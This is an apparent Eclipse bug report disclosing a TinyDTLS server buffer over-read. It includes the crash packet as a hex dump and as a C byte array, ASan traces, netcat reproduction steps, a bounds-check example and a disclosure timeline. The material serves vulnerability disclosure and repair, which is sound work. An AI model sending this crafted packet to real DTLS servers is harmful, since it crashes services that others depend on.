Bug 544819 - DTLS server - buffer overflow leading to crash (dtls_create_cookie)
Status: RESOLVED FIXED
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Vulnerability Reports
Version: unspecified
Hardware: All All
Importance: P3 major
Target Milestone: ---
Assignee: Security vulnerabilities reported against Eclipse projects CLA
Keywords: security
Reported: 2019-02-26 07:44 EST by Cve Reporting CLA
Modified: 2020-01-09 06:55 EST

Attachments
DTLS packet causing crash (80 bytes, image/x-panasonic-raw)
2019-02-26 07:44 EST, Cve Reporting CLA

Description Cve Reporting CLA 2019-02-26 07:44:47 EST
Created attachment 277690
DTLS packet causing crash

The TinyDTLS DTLS server incorrectly handles incoming network messages, leading to a buffer over-read and a crash of the server.
After processing a crafted packet, the server incorrectly handles the fragment length value provided in the DTLS handshake message.
The function dtls_create_cookie runs dtls_hmac_update with an ilen value larger than the size of the input buffer (in the example server, allocated as a global static buffer of fixed size).
That leads to a crash of the whole DTLS server via the SIGSEGV signal.

Proposed CVSS 3.0 score:

7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Error message WITHOUT Address Sanitizer:
--------------------------------------------------------------------------------------
./tinydtls_0.9/tests/dtls-server -p 5555 -v 10

Feb 26 12:34:15 DEBG got 80 bytes from port 42443
Feb 26 12:34:15 DEBG dtls_handle_message: PEER NOT FOUND
Feb 26 12:34:15 DEBG peer addr: [...]:42443
Feb 26 12:34:15 DEBG got packet 22 (77 bytes)
Feb 26 12:34:15 DEBG receive header: (13 bytes):
00000000 16 FE FD 00 A7 F6 40 58  00 40 FF 00 40 
Feb 26 12:34:15 DEBG receive unencrypted: (64 bytes):
00000000 01 F6 40 42 4D 00 00 00  00 80 00 3F 3F 3F 3F 3F 
00000010 3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F 
00000020 3F 3F 3F 3F 3F 3F 3F 3F  3F 40 16 16 FE FD 00 00 
00000030 00 0E 00 4D 00 00 40 16  F6 40 01 00 00 00 58 4D 

Feb 26 12:34:15 DEBG received handshake packet of type: client_hello (1)
Feb 26 12:34:15 DEBG handle handshake packet of type: client_hello (1)
Segmentation fault
--------------------------------------------------------------------------------------

Error message WITH Address Sanitizer:
--------------------------------------------------------------------------------------
./tinydtls_0.9/tests/dtls-server -p 5555 -v 10

Feb 26 11:36:02 DEBG got 80 bytes from port 51555
Feb 26 11:36:02 DEBG dtls_handle_message: PEER NOT FOUND
Feb 26 11:36:02 DEBG peer addr: [...]:51555
Feb 26 11:36:02 DEBG got packet 22 (77 bytes)
Feb 26 11:36:02 DEBG receive header: (13 bytes):
00000000 16 FE FD 00 A7 F6 40 58  00 40 FF 00 40 
Feb 26 11:36:02 DEBG receive unencrypted: (64 bytes):
00000000 01 F6 40 42 4D 00 00 00  00 80 00 3F 3F 3F 3F 3F 
00000010 3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F 
00000020 3F 3F 3F 3F 3F 3F 3F 3F  3F 40 16 16 FE FD 00 00 
00000030 00 0E 00 4D 00 00 40 16  F6 40 01 00 00 00 58 4D 

Feb 26 11:36:02 DEBG received handshake packet of type: client_hello (1)
Feb 26 11:36:02 DEBG handle handshake packet of type: client_hello (1)
dtls_get_fragment_length(DTLS_HANDSHAKE_HEADER(msg)) - e = 8388635
=================================================================
==24848==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000062e5da at pc 0x00000041d8f8 bp 0x7ffd6deabc50 sp 0x7ffd6deabc40
READ of size 4 at 0x00000062e5da thread T0
    #0 0x41d8f7 in dtls_sha256_transform tinydtls_0.9/sha2/sha2.c:494
    #1 0x41dd44 in dtls_sha256_update tinydtls_0.9/sha2/sha2.c:587
    #2 0x4156df in dtls_hash_update tinydtls_0.9/hmac.h:61
    #3 0x4156df in dtls_hmac_update tinydtls_0.9/hmac.c:73
    #4 0x40b6c6 in dtls_create_cookie tinydtls_0.9/dtls.c:385
    #5 0x40b6c6 in dtls_verify_peer tinydtls_0.9/dtls.c:1697
    #6 0x40b6c6 in handle_handshake_msg tinydtls_0.9/dtls.c:3390
    #7 0x4102b0 in handle_handshake tinydtls_0.9/dtls.c:3549
    #8 0x4102b0 in dtls_handle_message tinydtls_0.9/dtls.c:3936
    #9 0x402dc9 in dtls_handle_read tinydtls_0.9/tests/dtls-server.c:177
    #10 0x402dc9 in main tinydtls_0.9/tests/dtls-server.c:352
    #11 0x7f97890e582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x401ba8 in _start (tinydtls_0.9/tests/dtls-server+0x401ba8)

0x00000062e5da is located 38 bytes to the left of global variable 'addrstr' defined in 'dtls-server.c:185:15' (0x62e600) of size 256
0x00000062e5da is located 2 bytes to the right of global variable 'buf' defined in 'dtls-server.c:154:16' (0x62e060) of size 1400
SUMMARY: AddressSanitizer: global-buffer-overflow tinydtls_0.9/sha2/sha2.c:494 dtls_sha256_transform
==24848==ABORTING
--------------------------------------------------------------------------------------

Reproduction:

1. Compile tinydtls with Address Sanitizer by enabling the compilation flag -fsanitize=address (using ASAN is not mandatory for reproduction, but it gives more information about the crash).

2. Run DTLS server:
    ./tinydtls_0.9/tests/dtls-server -p 5555 -v 10

3. Send the attached crafted message, e.g. using netcat:
    netcat -u $IP 5555 < crash_001_dtls_create_cookie.raw
    where $IP is the IP of the test server
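The length check that is missing on the path described above, as an added example written for this page (it is neither tinydtls code nor the content of the fix commit): it parses the 77 record bytes dumped in the report, reproduces the reporter's 8388635 figure with the trusting arithmetic, and shows the same walk rejecting the packet once fragment_length is compared with the bytes actually received. The 13-byte record header, 12-byte handshake header and 34-byte ClientHello prefix are DTLS 1.2 layout constants; the function names are this example's own.

```c
#include <stdint.h>
#include <string.h>

/* Constructed copy of the packet from the report: the 13-byte record header
 * and the 64-byte handshake body as dumped (the attachment's last 3 bytes are not shown). */
static const uint8_t crash_pkt[77] = {
  0x16,0xFE,0xFD,0x00,0xA7,0xF6,0x40,0x58,0x00,0x40,0xFF,0x00,0x40,
  0x01,0xF6,0x40,0x42,0x4D,0x00,0x00,0x00,0x00,0x80,0x00,0x3F,0x3F,0x3F,0x3F,0x3F,
  0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,
  0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x3F,0x40,0x16,0x16,0xFE,0xFD,0x00,0x00,
  0x00,0x0E,0x00,0x4D,0x00,0x00,0x40,0x16,0xF6,0x40,0x01,0x00,0x00,0x00,0x58,0x4D };

#define DTLS_RH_LENGTH 13 /* record header: type, version, epoch, 48-bit seq, length */
#define DTLS_HS_LENGTH 12 /* handshake header: type, length, message_seq, frag_offset, frag_length */
#define DTLS_CH_FIXED  34 /* ClientHello prefix: client_version(2) + random(32) */

static uint32_t be24(const uint8_t *p) { return ((uint32_t)p[0] << 16) | ((uint32_t)p[1] << 8) | p[2]; }

/* The unchecked arithmetic of dtls_create_cookie: walk past session_id and cookie trusting
 * their length bytes, then subtract from fragment_length (8388635 for crash_pkt). */
long dtls_unchecked_tail_len(const uint8_t *pkt) {
  const uint8_t *msg = pkt + DTLS_RH_LENGTH, *ch = msg + DTLS_HS_LENGTH;
  size_t e = DTLS_CH_FIXED;
  e += ch[e] + 1;  /* session_id */
  e += ch[e] + 1;  /* cookie */
  return (long)be24(msg + 9) - (long)e;
}

/* Same value, but only when every length field fits the bytes actually
 * received; -1 otherwise, so no HMAC update can read past the buffer. */
long dtls_checked_tail_len(const uint8_t *pkt, size_t pktlen) {
  if (pktlen < DTLS_RH_LENGTH + DTLS_HS_LENGTH) return -1;
  size_t rlen = ((size_t)pkt[11] << 8) | pkt[12];           /* record length */
  if (rlen < DTLS_HS_LENGTH || rlen > pktlen - DTLS_RH_LENGTH) return -1;
  const uint8_t *msg = pkt + DTLS_RH_LENGTH, *ch = msg + DTLS_HS_LENGTH;
  uint32_t frag_len = be24(msg + 9);
  if (frag_len > rlen - DTLS_HS_LENGTH) return -1;          /* the missing check */
  size_t e = DTLS_CH_FIXED;
  if (e >= frag_len) return -1;
  e += ch[e] + 1;                                            /* session_id */
  if (e >= frag_len) return -1;
  e += ch[e] + 1;                                            /* cookie */
  return e > frag_len ? -1 : (long)(frag_len - e);
}

/* Test helper: crash_pkt with fragment_length rewritten to frag_len. */
long dtls_checked_tail_len_with(uint32_t frag_len) {
  uint8_t p[sizeof crash_pkt];
  memcpy(p, crash_pkt, sizeof p);
  p[22] = (uint8_t)(frag_len >> 16); p[23] = (uint8_t)(frag_len >> 8); p[24] = (uint8_t)frag_len;
  return dtls_checked_tail_len(p, sizeof p);
}
```

With the record's 52 handshake bytes, the unchecked value asks the HMAC to read 8388635 bytes from the example server's 1400-byte global buffer, which is the global-buffer-overflow ASan reports; the checked version returns -1 for the crafted packet and 16 for the same packet with a consistent fragment_length of 52.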
Comment 1 Cve Reporting CLA 2019-05-03 05:20:36 EDT
We have postponed the release of the payload for this vulnerability in the Cotopaxi framework (https://github.com/samsung/cotopaxi).
Please provide any information on when this issue will be fixed.
If there is no response for 90 days from the report date (26th of February 2019), we will release it to the public.
Comment 2 Wayne Beaton CLA 2019-05-14 13:59:32 EDT
Project team, there's help in the handbook regarding how we deal with vulnerability reports.

https://www.eclipse.org/projects/handbook/#vulnerability
Comment 3 Cve Reporting CLA 2019-07-11 11:47:56 EDT
Please provide any information on when this issue will be fixed.
We will release the findings to the public before Black Hat USA (August 2019).
Comment 4 Wayne Beaton CLA 2019-07-18 16:14:36 EDT
I've removed the "committers only" flag to disclose per the security policy.
Comment 5 Olaf Bergmann CLA 2019-07-26 03:22:30 EDT
This bug has been fixed in https://github.com/eclipse/tinydtls/commit/68a1cdaff9e329e13ea59529f1eb61b05632c297

This is currently in the develop branch and will be merged into master as well.
Comment 6 Cve Reporting CLA 2020-01-07 08:36:19 EST
Please register this issue in CVE database.
Comment 7 Cve Reporting CLA 2020-01-09 06:55:35 EST
This vulnerability affects the following versions of tinydtls:
- 0.9 (master)
- 0.8.2
- 0.8.1
- 0.4.0
- 0.3.1